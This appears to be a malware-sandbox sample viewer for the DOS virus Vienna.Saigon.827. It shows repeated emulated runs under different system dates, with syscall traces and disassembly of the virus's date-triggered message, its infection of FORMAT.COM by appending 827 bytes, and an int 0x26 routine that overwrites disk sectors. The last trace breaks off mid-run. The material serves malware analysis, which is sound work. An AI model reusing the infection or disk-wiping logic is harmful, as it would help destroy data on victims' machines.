Sample viewer

vx.netlux.org/Virus.DOS.Vienna.Saigon.827

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:15:20.097758193Z 255 PC: 12a6d | UNKNOWN!
2018-12-17T22:15:20.099107584Z 42 PC: 12a7a | Get date 0x12a7a: cmp cx, 0x7c9
0x12a7e: jb 0x12a9a
0x12a80: jge 0x12a85
0x12a82: jmp 0x12ae0
0x12a84: nop
0x12a85: mov ah, 0x2a
0x12a87: nop
0x12a88: int 0x21
0x12a8a: cmp dh, 5
0x12a8d: jge 0x12a92
0x12a8f: jmp 0x12ae0
0x12a91: nop
0x12a92: cmp dl, 0xd
0x12a95: jge 0x12ab8
0x12a97: jmp 0x12ae0
0x12a99: nop
0x12a9a: cmp cx, 0x7c6
0x12a9e: je 0x12aad
0x12aa0: mov ah, 0x2b
0x12aa2: mov cx, 0x7c6
2018-12-17T22:15:20.101745346Z 42 PC: 12a8a | Get date 0x12a8a: cmp dh, 5
0x12a8d: jge 0x12a92
0x12a8f: jmp 0x12ae0
0x12a91: nop
0x12a92: cmp dl, 0xd
0x12a95: jge 0x12ab8
0x12a97: jmp 0x12ae0
0x12a99: nop
0x12a9a: cmp cx, 0x7c6
0x12a9e: je 0x12aad
0x12aa0: mov ah, 0x2b
0x12aa2: mov cx, 0x7c6
0x12aa5: int 0x21
0x12aa7: mov ah, 0x2d
0x12aa9: mov cl, 1
0x12aab: int 0x21
0x12aad: mov ah, 0x2c
0x12aaf: int 0x21
0x12ab1: cmp cl, 0xf
0x12ab4: jae 0x12ac2
2018-12-17T22:15:20.103838199Z 9 PC: 12ac2 | Display string (String= ' Saigon will never fall!.. ')
2018-12-17T22:15:20.109603653Z 47 PC: 12ae5 | Get disk transfer address
2018-12-17T22:15:20.111863963Z 26 PC: 12af8 | Set disk transfer address
2018-12-17T22:15:20.113577755Z 78 PC: 12b85 | Find first file
2018-12-17T22:15:20.119723889Z 79 PC: 12b8b | Find next file
2018-12-17T22:15:20.125245605Z 79 PC: 12b8b | Find next file
2018-12-17T22:15:20.128021048Z 79 PC: 12b8b | Find next file
2018-12-17T22:15:20.130699862Z 79 PC: 12b8b | Find next file
2018-12-17T22:15:20.13397163Z 79 PC: 12b8b | Find next file
2018-12-17T22:15:20.136563657Z 79 PC: 12b8b | Find next file
2018-12-17T22:15:20.139345174Z 79 PC: 12b8b | Find next file
2018-12-17T22:15:20.14324923Z 79 PC: 12b8b | Find next file
2018-12-17T22:15:20.145957486Z 78 PC: 12b85 | Find first file
2018-12-17T22:15:20.155199352Z 79 PC: 12b8b | Find next file
2018-12-17T22:15:20.158675451Z 67 PC: 12bc4 | Get or set file attributes
2018-12-17T22:15:20.164549001Z 67 PC: 12bd6 | Get or set file attributes
2018-12-17T22:15:20.510792324Z 61 PC: 12be1 | Open file (Filename = 'C:\DOS\FORMAT.COM')
2018-12-17T22:15:20.517924167Z 87 PC: 12bed | Get or set file date and time
2018-12-17T22:15:20.523280829Z 44 PC: 12bf9 | Get time 0x12bf9: mov ah, 0x3f
0x12bfb: mov cx, 3
0x12bfe: mov dx, 0x69
0x12c01: nop
0x12c02: add dx, si
0x12c04: int 0x21
0x12c06: jb 0x12c5e
0x12c08: cmp ax, 3
0x12c0b: jne 0x12c5e
0x12c0d: mov ax, 0x4202
0x12c10: mov cx, 0
0x12c13: mov dx, 0
0x12c16: int 0x21
0x12c18: jb 0x12c5e
0x12c1a: mov cx, ax
0x12c1c: sub ax, 3
0x12c1f: mov word ptr [si + 0x6d], ax
0x12c22: nop
0x12c23: add cx, 0x352
0x12c27: mov di, si
2018-12-17T22:15:20.526200505Z 63 PC: 12c06 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:15:20.532072749Z 66 PC: 12c18 | Move file pointer
2018-12-17T22:15:20.534224451Z 64 PC: 12c3d | Write file or device (Write 827 bytes on handle 5)
2018-12-17T22:15:20.541889346Z 66 PC: 12c4f | Move file pointer
2018-12-17T22:15:20.554341062Z 64 PC: 12c5e | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:15:20.557573448Z 87 PC: 12c71 | Get or set file date and time
2018-12-17T22:15:20.559398673Z 62 PC: 12c75 | Close file
2018-12-17T22:15:20.566271112Z 67 PC: 12c84 | Get or set file attributes
2018-12-17T22:15:20.577574129Z 26 PC: 12c91 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2816,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:46:32.961221791Z 255 PC: 12a6d | UNKNOWN!
2018-12-25T11:46:32.966544622Z 42 PC: 12a7a | Get date 0x12a7a: cmp cx, 0x7c9
0x12a7e: jb 0x12a9a
0x12a80: jge 0x12a85
0x12a82: jmp 0x12ae0
0x12a84: nop
0x12a85: mov ah, 0x2a
0x12a87: nop
0x12a88: int 0x21
0x12a8a: cmp dh, 5
0x12a8d: jge 0x12a92
0x12a8f: jmp 0x12ae0
0x12a91: nop
0x12a92: cmp dl, 0xd
0x12a95: jge 0x12ab8
0x12a97: jmp 0x12ae0
0x12a99: nop
0x12a9a: cmp cx, 0x7c6
0x12a9e: je 0x12aad
0x12aa0: mov ah, 0x2b
0x12aa2: mov cx, 0x7c6
2018-12-25T11:46:32.969116346Z 43 PC: 12aa7 | Set date
2018-12-25T11:46:32.97270307Z 45 PC: 12aad | Set time
2018-12-25T11:46:32.976793608Z 44 PC: 12ab1 | Get time 0x12ab1: cmp cl, 0xf
0x12ab4: jae 0x12ac2
0x12ab6: jmp 0x12a85
0x12ab8: mov ah, 9
0x12aba: mov dx, si
0x12abc: add dx, 0x41
0x12abf: nop
0x12ac0: int 0x21
0x12ac2: cmp byte ptr [si], 0x1a
0x12ac5: nop
0x12ac6: nop
0x12ac7: ja 0x12ae0
0x12ac9: pushf
0x12aca: mov al, byte ptr [si]
0x12acc: nop
0x12acd: nop
0x12ace: mov cx, 0x100
0x12ad1: mov dx, 0
0x12ad4: mov bx, 1
0x12ad7: int 0x26
2018-12-25T11:46:32.979131727Z 42 PC: 12a8a | Get date 0x12a8a: cmp dh, 5
0x12a8d: jge 0x12a92
0x12a8f: jmp 0x12ae0
0x12a91: nop
0x12a92: cmp dl, 0xd
0x12a95: jge 0x12ab8
0x12a97: jmp 0x12ae0
0x12a99: nop
0x12a9a: cmp cx, 0x7c6
0x12a9e: je 0x12aad
0x12aa0: mov ah, 0x2b
0x12aa2: mov cx, 0x7c6
0x12aa5: int 0x21
0x12aa7: mov ah, 0x2d
0x12aa9: mov cl, 1
0x12aab: int 0x21
0x12aad: mov ah, 0x2c
0x12aaf: int 0x21
0x12ab1: cmp cl, 0xf
0x12ab4: jae 0x12ac2
2018-12-25T11:46:32.981738183Z 47 PC: 12ae5 | Get disk transfer address
2018-12-25T11:46:32.986952014Z 26 PC: 12af8 | Set disk transfer address
2018-12-25T11:46:32.991362826Z 78 PC: 12b85 | Find first file
2018-12-25T11:46:33.005830728Z 79 PC: 12b8b | Find next file
2018-12-25T11:46:33.016457767Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.023046951Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.028447834Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.031270158Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.035137201Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.037923133Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.040729221Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.044408283Z 78 PC: 12b85 | Find first file (See above)
2018-12-25T11:46:33.053169014Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.056493746Z 67 PC: 12bc4 | Get or set file attributes
2018-12-25T11:46:33.063723342Z 67 PC: 12bd6 | Get or set file attributes
2018-12-25T11:46:34.054123986Z 61 PC: 12be1 | Open file (Filename = 'C:\DOS\FORMAT.COM')
2018-12-25T11:46:34.061109722Z 87 PC: 12bed | Get or set file date and time
2018-12-25T11:46:34.06293456Z 44 PC: 12bf9 | Get time 0x12bf9: mov ah, 0x3f
0x12bfb: mov cx, 3
0x12bfe: mov dx, 0x69
0x12c01: nop
0x12c02: add dx, si
0x12c04: int 0x21
0x12c06: jb 0x12c5e
0x12c08: cmp ax, 3
0x12c0b: jne 0x12c5e
0x12c0d: mov ax, 0x4202
0x12c10: mov cx, 0
0x12c13: mov dx, 0
0x12c16: int 0x21
0x12c18: jb 0x12c5e
0x12c1a: mov cx, ax
0x12c1c: sub ax, 3
0x12c1f: mov word ptr [si + 0x6d], ax
0x12c22: nop
0x12c23: add cx, 0x352
0x12c27: mov di, si
2018-12-25T11:46:34.079544283Z 63 PC: 12c06 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:46:34.085733832Z 66 PC: 12c18 | Move file pointer
2018-12-25T11:46:34.088003962Z 64 PC: 12c3d | Write file or device (Write 827 bytes on handle 5)
2018-12-25T11:46:34.095979718Z 66 PC: 12c4f | Move file pointer
2018-12-25T11:46:34.097331457Z 64 PC: 12c5e | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:46:34.100142995Z 87 PC: 12c71 | Get or set file date and time
2018-12-25T11:46:34.102377831Z 62 PC: 12c75 | Close file
2018-12-25T11:46:34.108922257Z 67 PC: 12c84 | Get or set file attributes
2018-12-25T11:46:34.118797068Z 26 PC: 12c91 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1990,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2816,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:46:33.032653481Z 255 PC: 12a6d | UNKNOWN!
2018-12-25T11:46:33.034611925Z 42 PC: 12a7a | Get date 0x12a7a: cmp cx, 0x7c9
0x12a7e: jb 0x12a9a
0x12a80: jge 0x12a85
0x12a82: jmp 0x12ae0
0x12a84: nop
0x12a85: mov ah, 0x2a
0x12a87: nop
0x12a88: int 0x21
0x12a8a: cmp dh, 5
0x12a8d: jge 0x12a92
0x12a8f: jmp 0x12ae0
0x12a91: nop
0x12a92: cmp dl, 0xd
0x12a95: jge 0x12ab8
0x12a97: jmp 0x12ae0
0x12a99: nop
0x12a9a: cmp cx, 0x7c6
0x12a9e: je 0x12aad
0x12aa0: mov ah, 0x2b
0x12aa2: mov cx, 0x7c6
2018-12-25T11:46:33.036949566Z 44 PC: 12ab1 | Get time 0x12ab1: cmp cl, 0xf
0x12ab4: jae 0x12ac2
0x12ab6: jmp 0x12a85
0x12ab8: mov ah, 9
0x12aba: mov dx, si
0x12abc: add dx, 0x41
0x12abf: nop
0x12ac0: int 0x21
0x12ac2: cmp byte ptr [si], 0x1a
0x12ac5: nop
0x12ac6: nop
0x12ac7: ja 0x12ae0
0x12ac9: pushf
0x12aca: mov al, byte ptr [si]
0x12acc: nop
0x12acd: nop
0x12ace: mov cx, 0x100
0x12ad1: mov dx, 0
0x12ad4: mov bx, 1
0x12ad7: int 0x26
2018-12-25T11:46:33.039918186Z 47 PC: 12ae5 | Get disk transfer address
2018-12-25T11:46:33.0414339Z 26 PC: 12af8 | Set disk transfer address
2018-12-25T11:46:33.043913471Z 78 PC: 12b85 | Find first file
2018-12-25T11:46:33.050691237Z 79 PC: 12b8b | Find next file
2018-12-25T11:46:33.053348886Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.057359936Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.060568012Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.063854558Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.06757829Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.07088033Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.074134223Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.077608673Z 78 PC: 12b85 | Find first file (See above)
2018-12-25T11:46:33.084611456Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.086902922Z 67 PC: 12bc4 | Get or set file attributes
2018-12-25T11:46:33.092621822Z 67 PC: 12bd6 | Get or set file attributes
2018-12-25T11:46:33.430881703Z 61 PC: 12be1 | Open file (Filename = 'C:\DOS\FORMAT.COM')
2018-12-25T11:46:33.438817676Z 87 PC: 12bed | Get or set file date and time
2018-12-25T11:46:33.441395012Z 44 PC: 12bf9 | Get time 0x12bf9: mov ah, 0x3f
0x12bfb: mov cx, 3
0x12bfe: mov dx, 0x69
0x12c01: nop
0x12c02: add dx, si
0x12c04: int 0x21
0x12c06: jb 0x12c5e
0x12c08: cmp ax, 3
0x12c0b: jne 0x12c5e
0x12c0d: mov ax, 0x4202
0x12c10: mov cx, 0
0x12c13: mov dx, 0
0x12c16: int 0x21
0x12c18: jb 0x12c5e
0x12c1a: mov cx, ax
0x12c1c: sub ax, 3
0x12c1f: mov word ptr [si + 0x6d], ax
0x12c22: nop
0x12c23: add cx, 0x352
0x12c27: mov di, si
2018-12-25T11:46:33.445647163Z 63 PC: 12c06 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:46:33.452319055Z 66 PC: 12c18 | Move file pointer
2018-12-25T11:46:33.454312562Z 64 PC: 12c3d | Write file or device (Write 827 bytes on handle 5)
2018-12-25T11:46:33.464166469Z 66 PC: 12c4f | Move file pointer
2018-12-25T11:46:33.465693783Z 64 PC: 12c5e | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:46:33.468782413Z 87 PC: 12c71 | Get or set file date and time
2018-12-25T11:46:33.471154498Z 62 PC: 12c75 | Close file
2018-12-25T11:46:33.478463668Z 67 PC: 12c84 | Get or set file attributes
2018-12-25T11:46:33.489579983Z 26 PC: 12c91 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1993,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2816,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:46:33.042197184Z 255 PC: 12a6d | UNKNOWN!
2018-12-25T11:46:33.044013896Z 42 PC: 12a7a | Get date 0x12a7a: cmp cx, 0x7c9
0x12a7e: jb 0x12a9a
0x12a80: jge 0x12a85
0x12a82: jmp 0x12ae0
0x12a84: nop
0x12a85: mov ah, 0x2a
0x12a87: nop
0x12a88: int 0x21
0x12a8a: cmp dh, 5
0x12a8d: jge 0x12a92
0x12a8f: jmp 0x12ae0
0x12a91: nop
0x12a92: cmp dl, 0xd
0x12a95: jge 0x12ab8
0x12a97: jmp 0x12ae0
0x12a99: nop
0x12a9a: cmp cx, 0x7c6
0x12a9e: je 0x12aad
0x12aa0: mov ah, 0x2b
0x12aa2: mov cx, 0x7c6
2018-12-25T11:46:33.054944304Z 42 PC: 12a8a | Get date 0x12a8a: cmp dh, 5
0x12a8d: jge 0x12a92
0x12a8f: jmp 0x12ae0
0x12a91: nop
0x12a92: cmp dl, 0xd
0x12a95: jge 0x12ab8
0x12a97: jmp 0x12ae0
0x12a99: nop
0x12a9a: cmp cx, 0x7c6
0x12a9e: je 0x12aad
0x12aa0: mov ah, 0x2b
0x12aa2: mov cx, 0x7c6
0x12aa5: int 0x21
0x12aa7: mov ah, 0x2d
0x12aa9: mov cl, 1
0x12aab: int 0x21
0x12aad: mov ah, 0x2c
0x12aaf: int 0x21
0x12ab1: cmp cl, 0xf
0x12ab4: jae 0x12ac2
2018-12-25T11:46:33.057128134Z 47 PC: 12ae5 | Get disk transfer address
2018-12-25T11:46:33.059241554Z 26 PC: 12af8 | Set disk transfer address
2018-12-25T11:46:33.060816486Z 78 PC: 12b85 | Find first file
2018-12-25T11:46:33.07379458Z 79 PC: 12b8b | Find next file
2018-12-25T11:46:33.078420762Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.08838596Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.091186819Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.094897452Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.098690774Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.101463644Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.104369252Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.108037733Z 78 PC: 12b85 | Find first file (See above)
2018-12-25T11:46:33.121257578Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.12434228Z 67 PC: 12bc4 | Get or set file attributes
2018-12-25T11:46:33.131430817Z 67 PC: 12bd6 | Get or set file attributes
2018-12-25T11:46:34.054128751Z 61 PC: 12be1 | Open file (Filename = 'C:\DOS\FORMAT.COM')
2018-12-25T11:46:34.070382426Z 87 PC: 12bed | Get or set file date and time
2018-12-25T11:46:34.073040833Z 44 PC: 12bf9 | Get time 0x12bf9: mov ah, 0x3f
0x12bfb: mov cx, 3
0x12bfe: mov dx, 0x69
0x12c01: nop
0x12c02: add dx, si
0x12c04: int 0x21
0x12c06: jb 0x12c5e
0x12c08: cmp ax, 3
0x12c0b: jne 0x12c5e
0x12c0d: mov ax, 0x4202
0x12c10: mov cx, 0
0x12c13: mov dx, 0
0x12c16: int 0x21
0x12c18: jb 0x12c5e
0x12c1a: mov cx, ax
0x12c1c: sub ax, 3
0x12c1f: mov word ptr [si + 0x6d], ax
0x12c22: nop
0x12c23: add cx, 0x352
0x12c27: mov di, si
2018-12-25T11:46:34.075664877Z 63 PC: 12c06 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:46:34.081405608Z 66 PC: 12c18 | Move file pointer
2018-12-25T11:46:34.083496719Z 64 PC: 12c3d | Write file or device (Write 827 bytes on handle 5)
2018-12-25T11:46:34.091642809Z 66 PC: 12c4f | Move file pointer
2018-12-25T11:46:34.093294208Z 64 PC: 12c5e | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:46:34.096593335Z 87 PC: 12c71 | Get or set file date and time
2018-12-25T11:46:34.098621097Z 62 PC: 12c75 | Close file
2018-12-25T11:46:34.105150405Z 67 PC: 12c84 | Get or set file attributes
2018-12-25T11:46:34.114911036Z 26 PC: 12c91 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":5,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2816,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:46:33.443793924Z 255 PC: 12a6d | UNKNOWN!
2018-12-25T11:46:33.445437313Z 42 PC: 12a7a | Get date 0x12a7a: cmp cx, 0x7c9
0x12a7e: jb 0x12a9a
0x12a80: jge 0x12a85
0x12a82: jmp 0x12ae0
0x12a84: nop
0x12a85: mov ah, 0x2a
0x12a87: nop
0x12a88: int 0x21
0x12a8a: cmp dh, 5
0x12a8d: jge 0x12a92
0x12a8f: jmp 0x12ae0
0x12a91: nop
0x12a92: cmp dl, 0xd
0x12a95: jge 0x12ab8
0x12a97: jmp 0x12ae0
0x12a99: nop
0x12a9a: cmp cx, 0x7c6
0x12a9e: je 0x12aad
0x12aa0: mov ah, 0x2b
0x12aa2: mov cx, 0x7c6
2018-12-25T11:46:33.447430989Z 43 PC: 12aa7 | Set date
2018-12-25T11:46:33.450432942Z 45 PC: 12aad | Set time
2018-12-25T11:46:33.453422176Z 44 PC: 12ab1 | Get time 0x12ab1: cmp cl, 0xf
0x12ab4: jae 0x12ac2
0x12ab6: jmp 0x12a85
0x12ab8: mov ah, 9
0x12aba: mov dx, si
0x12abc: add dx, 0x41
0x12abf: nop
0x12ac0: int 0x21
0x12ac2: cmp byte ptr [si], 0x1a
0x12ac5: nop
0x12ac6: nop
0x12ac7: ja 0x12ae0
0x12ac9: pushf
0x12aca: mov al, byte ptr [si]
0x12acc: nop
0x12acd: nop
0x12ace: mov cx, 0x100
0x12ad1: mov dx, 0
0x12ad4: mov bx, 1
0x12ad7: int 0x26
2018-12-25T11:46:33.455771901Z 42 PC: 12a8a | Get date 0x12a8a: cmp dh, 5
0x12a8d: jge 0x12a92
0x12a8f: jmp 0x12ae0
0x12a91: nop
0x12a92: cmp dl, 0xd
0x12a95: jge 0x12ab8
0x12a97: jmp 0x12ae0
0x12a99: nop
0x12a9a: cmp cx, 0x7c6
0x12a9e: je 0x12aad
0x12aa0: mov ah, 0x2b
0x12aa2: mov cx, 0x7c6
0x12aa5: int 0x21
0x12aa7: mov ah, 0x2d
0x12aa9: mov cl, 1
0x12aab: int 0x21
0x12aad: mov ah, 0x2c
0x12aaf: int 0x21
0x12ab1: cmp cl, 0xf
0x12ab4: jae 0x12ac2
2018-12-25T11:46:33.457837259Z 47 PC: 12ae5 | Get disk transfer address
2018-12-25T11:46:33.458900946Z 26 PC: 12af8 | Set disk transfer address
2018-12-25T11:46:33.460527777Z 78 PC: 12b85 | Find first file
2018-12-25T11:46:33.471253Z 79 PC: 12b8b | Find next file
2018-12-25T11:46:33.473724601Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.47732239Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.480587611Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.483786788Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.495650518Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.498277041Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.500885471Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.504103579Z 78 PC: 12b85 | Find first file (See above)
2018-12-25T11:46:33.512605257Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.516757187Z 67 PC: 12bc4 | Get or set file attributes
2018-12-25T11:46:33.522881239Z 67 PC: 12bd6 | Get or set file attributes
2018-12-25T11:46:34.054715519Z 61 PC: 12be1 | Open file (Filename = 'C:\DOS\FORMAT.COM')
2018-12-25T11:46:34.061891209Z 87 PC: 12bed | Get or set file date and time
2018-12-25T11:46:34.064756058Z 44 PC: 12bf9 | Get time 0x12bf9: mov ah, 0x3f
0x12bfb: mov cx, 3
0x12bfe: mov dx, 0x69
0x12c01: nop
0x12c02: add dx, si
0x12c04: int 0x21
0x12c06: jb 0x12c5e
0x12c08: cmp ax, 3
0x12c0b: jne 0x12c5e
0x12c0d: mov ax, 0x4202
0x12c10: mov cx, 0
0x12c13: mov dx, 0
0x12c16: int 0x21
0x12c18: jb 0x12c5e
0x12c1a: mov cx, ax
0x12c1c: sub ax, 3
0x12c1f: mov word ptr [si + 0x6d], ax
0x12c22: nop
0x12c23: add cx, 0x352
0x12c27: mov di, si
2018-12-25T11:46:34.067156627Z 63 PC: 12c06 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:46:34.072876588Z 66 PC: 12c18 | Move file pointer
2018-12-25T11:46:34.075690063Z 64 PC: 12c3d | Write file or device (Write 827 bytes on handle 5)
2018-12-25T11:46:34.083357827Z 66 PC: 12c4f | Move file pointer
2018-12-25T11:46:34.085007333Z 64 PC: 12c5e | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:46:34.089154625Z 87 PC: 12c71 | Get or set file date and time
2018-12-25T11:46:34.090945647Z 62 PC: 12c75 | Close file
2018-12-25T11:46:34.097472226Z 67 PC: 12c84 | Get or set file attributes
2018-12-25T11:46:34.10815154Z 26 PC: 12c91 | Set disk transfer address

{"DateBased":true,"Day":13,"Month":5,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2816,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:46:33.716413176Z 255 PC: 12a6d | UNKNOWN!
2018-12-25T11:46:33.7172688Z 42 PC: 12a7a | Get date 0x12a7a: cmp cx, 0x7c9
0x12a7e: jb 0x12a9a
0x12a80: jge 0x12a85
0x12a82: jmp 0x12ae0
0x12a84: nop
0x12a85: mov ah, 0x2a
0x12a87: nop
0x12a88: int 0x21
0x12a8a: cmp dh, 5
0x12a8d: jge 0x12a92
0x12a8f: jmp 0x12ae0
0x12a91: nop
0x12a92: cmp dl, 0xd
0x12a95: jge 0x12ab8
0x12a97: jmp 0x12ae0
0x12a99: nop
0x12a9a: cmp cx, 0x7c6
0x12a9e: je 0x12aad
0x12aa0: mov ah, 0x2b
0x12aa2: mov cx, 0x7c6
2018-12-25T11:46:33.720263468Z 43 PC: 12aa7 | Set date
2018-12-25T11:46:33.724432644Z 45 PC: 12aad | Set time
2018-12-25T11:46:33.728366861Z 44 PC: 12ab1 | Get time 0x12ab1: cmp cl, 0xf
0x12ab4: jae 0x12ac2
0x12ab6: jmp 0x12a85
0x12ab8: mov ah, 9
0x12aba: mov dx, si
0x12abc: add dx, 0x41
0x12abf: nop
0x12ac0: int 0x21
0x12ac2: cmp byte ptr [si], 0x1a
0x12ac5: nop
0x12ac6: nop
0x12ac7: ja 0x12ae0
0x12ac9: pushf
0x12aca: mov al, byte ptr [si]
0x12acc: nop
0x12acd: nop
0x12ace: mov cx, 0x100
0x12ad1: mov dx, 0
0x12ad4: mov bx, 1
0x12ad7: int 0x26
2018-12-25T11:46:33.73151146Z 42 PC: 12a8a | Get date 0x12a8a: cmp dh, 5
0x12a8d: jge 0x12a92
0x12a8f: jmp 0x12ae0
0x12a91: nop
0x12a92: cmp dl, 0xd
0x12a95: jge 0x12ab8
0x12a97: jmp 0x12ae0
0x12a99: nop
0x12a9a: cmp cx, 0x7c6
0x12a9e: je 0x12aad
0x12aa0: mov ah, 0x2b
0x12aa2: mov cx, 0x7c6
0x12aa5: int 0x21
0x12aa7: mov ah, 0x2d
0x12aa9: mov cl, 1
0x12aab: int 0x21
0x12aad: mov ah, 0x2c
0x12aaf: int 0x21
0x12ab1: cmp cl, 0xf
0x12ab4: jae 0x12ac2
2018-12-25T11:46:33.734065367Z 9 PC: 12ac2 | Display string (String= ' Saigon will never fall!.. ')
2018-12-25T11:46:33.740991236Z 47 PC: 12ae5 | Get disk transfer address
2018-12-25T11:46:33.742763204Z 26 PC: 12af8 | Set disk transfer address
2018-12-25T11:46:33.74425274Z 78 PC: 12b85 | Find first file
2018-12-25T11:46:33.758260273Z 79 PC: 12b8b | Find next file
2018-12-25T11:46:33.761886878Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.764809509Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.767588577Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.770876192Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.773399808Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.775486175Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.777572854Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.781742527Z 78 PC: 12b85 | Find first file (See above)
2018-12-25T11:46:33.792254559Z 79 PC: 12b8b | Find next file (See above)
2018-12-25T11:46:33.796340963Z 67 PC: 12bc4 | Get or set file attributes
2018-12-25T11:46:33.803916258Z 67 PC: 12bd6 | Get or set file attributes
2018-12-25T11:46:34.483983413Z 61 PC: 12be1 | Open file (Filename = 'C:\DOS\FORMAT.COM')
2018-12-25T11:46:34.494088868Z 87 PC: 12bed | Get or set file date and time
2018-12-25T11:46:34.497232966Z 44 PC: 12bf9 | Get time 0x12bf9: mov ah, 0x3f
0x12bfb: mov cx, 3
0x12bfe: mov dx, 0x69
0x12c01: nop
0x12c02: add dx, si
0x12c04: int 0x21
0x12c06: jb 0x12c5e
0x12c08: cmp ax, 3
0x12c0b: jne 0x12c5e
0x12c0d: mov ax, 0x4202
0x12c10: mov cx, 0
0x12c13: mov dx, 0
0x12c16: int 0x21
0x12c18: jb 0x12c5e
0x12c1a: mov cx, ax
0x12c1c: sub ax, 3
0x12c1f: mov word ptr [si + 0x6d], ax
0x12c22: nop
0x12c23: add cx, 0x352
0x12c27: mov di, si
2018-12-25T11:46:34.500768157Z 63 PC: 12c06 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:46:34.508062876Z 66 PC: 12c18 | Move file pointer
2018-12-25T11:46:34.51069453Z 64 PC: 12c3d | Write file or device (Write 827 bytes on handle 5)
2018-12-25T11:46:34.52074948Z 66 PC: 12c4f | Move file pointer
2018-12-25T11:46:34.523381386Z 64 PC: 12c5e | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:46:34.527975666Z 87 PC: 12c71 | Get or set file date and time
2018-12-25T11:46:34.529953794Z 62 PC: 12c75 | Close file
2018-12-25T11:46:34.537699751Z 67 PC: 12c84 | Get or set file attributes
2018-12-25T11:46:34.550670915Z 26 PC: 12c91 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2816,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:46:33.80975478Z 255 PC: 12a6d | UNKNOWN!
2018-12-25T11:46:33.811312477Z 42 PC: 12a7a | Get date 0x12a7a: cmp cx, 0x7c9
0x12a7e: jb 0x12a9a
0x12a80: jge 0x12a85
0x12a82: jmp 0x12ae0
0x12a84: nop
0x12a85: mov ah, 0x2a
0x12a87: nop
0x12a88: int 0x21
0x12a8a: cmp dh, 5
0x12a8d: jge 0x12a92
0x12a8f: jmp 0x12ae0
0x12a91: nop
0x12a92: cmp dl, 0xd
0x12a95: jge 0x12ab8
0x12a97: jmp 0x12ae0
0x12a99: nop
0x12a9a: cmp cx, 0x7c6
0x12a9e: je 0x12aad
0x12aa0: mov ah, 0x2b
0x12aa2: mov cx, 0x7c6
2018-12-25T11:46:33.82116508Z 43 PC: 12aa7 | Set date
